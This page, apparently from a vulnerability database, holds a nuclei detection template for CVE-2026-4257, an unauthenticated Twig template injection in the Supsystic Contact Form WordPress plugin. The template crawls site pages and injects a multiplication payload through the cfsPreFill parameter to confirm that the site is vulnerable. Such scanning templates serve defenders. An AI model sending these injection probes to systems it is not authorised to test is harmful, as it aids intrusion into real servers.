Lucene search
K

WordPress Contact Form by Supsystic - Server-Side Template Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Unauthenticated code execution via server side template injection in WordPress Supsystic form up to version 1.7.36.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-4257
18 Apr 202619:39
githubexploit
GithubExploit
Exploit for CVE-2026-4257
11 May 202605:24
githubexploit
ATTACKERKB
CVE-2026-4257
30 Mar 202621:26
attackerkb
Circl
CVE-2026-4257
30 Mar 202622:20
circl
CNNVD
WordPress plugin Contact Form by Supsystic 代码注入漏洞
30 Mar 202600:00
cnnvd
CVE
CVE-2026-4257
30 Mar 202621:26
cve
Cvelist
CVE-2026-4257 Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality
30 Mar 202621:26
cvelist
Exploit DB
WordPress Plugin Supsystic Contact Form 1.7.36 - SSTI
14 May 202600:00
exploitdb
EUVD
EUVD-2026-17239
31 Mar 202600:31
euvd
Metasploit
Supsystic Contact Form Wordpress Plugin SSTI RCE
26 May 202619:01
metasploit
Rows per page
id: CVE-2026-4257

info:
  name: WordPress Contact Form by Supsystic - Server-Side Template Injection
  author: theamanrawat
  severity: critical
  description: |
    Contact Form by Supsystic WordPress plugin <= 1.7.36 contains a server-side template injection caused by unsandboxed Twig_Loader_String and cfsPreFill functionality, letting unauthenticated attackers execute arbitrary code remotely via GET parameters.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP functions and OS commands remotely, leading to full server compromise.
  remediation: |
    Update to the latest version beyond 1.7.36.
  reference:
    - https://patchstack.com/database/vulnerability/wordpress-contact-form-by-supsystic-plugin-1-7-36-unauthenticated-server-side-template-injection-via-prefill-functionality-vulnerability
    - https://plugins.trac.wordpress.org/browser/contact-form-by-supsystic/tags/1.7.36/modules/forms/views/forms.php#L323
    - https://plugins.trac.wordpress.org/changeset/3491826/contact-form-by-supsystic
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-4257
    epss-score: 0.41475
    epss-percentile: 0.98506
    cwe-id: CWE-94
  metadata:
    max-request: 7
    verified: true
    vendor: supsystic
    product: contact_form
    framework: wordpress
    shodan-query: http.component:"WordPress"
  tags: cve,cve2026,wordpress,wp-plugin,contact-form-by-supsystic,ssti,rce,twig,unauth

variables:
  num1: "{{rand_int(40000, 44800)}}"
  num2: "{{rand_int(40000, 44800)}}"
  payload: "%7B%7B{{num1}}*{{num2}}%7D%7D"
  result: "{{to_number(num1)*to_number(num2)}}"

flow: |
  http(1);
  let found = [];
  let seen = {};
  for (let p of iterate(template["page-paths"])) {
    if (!seen[p]) {
      seen[p] = true;
      found.push(p);
    }
  }
  let defaults = ["/?page_id=2", "/?page_id=3", "/?page_id=4", "/?page_id=5", "/?page_id=6"];
  for (let d of defaults) {
    if (!seen[d]) {
      seen[d] = true;
      found.push(d);
    }
  }
  for (let page of found) {
    let sep = page.includes("?") ? "&" : "?";
    set("pagepath", page + sep + "cfsPreFill=1&first_name={{payload}}");
    if (http(2)) break;
  }

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    extractors:
      - type: regex
        name: page-paths
        internal: true
        group: 1
        regex:
          - 'href="(?:https?://[^/"]+)?(/\?page_id=\d+)'
          - 'href="(?:https?://[^/"]+)?(/[a-z][a-z0-9-]+/)'
        part: body

  - method: GET
    path:
      - "{{BaseURL}}{{pagepath}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="{{result}}"'

      - type: word
        part: body
        words:
          - 'contact-form-by-supsystic'

      - type: status
        status:
          - 200
# digest: 490a0046304402205af1b0bc0edd3f84b2b97080f34a4ef8cfc98b07c4c69981d37626b50e2c0e9f0220021a722db5387f030dbbcd7522b3295597bb7a37dc124b801f93c3448b307de1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Mar 2026 09:59Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.19.8
EPSS0.41475
SSVC
12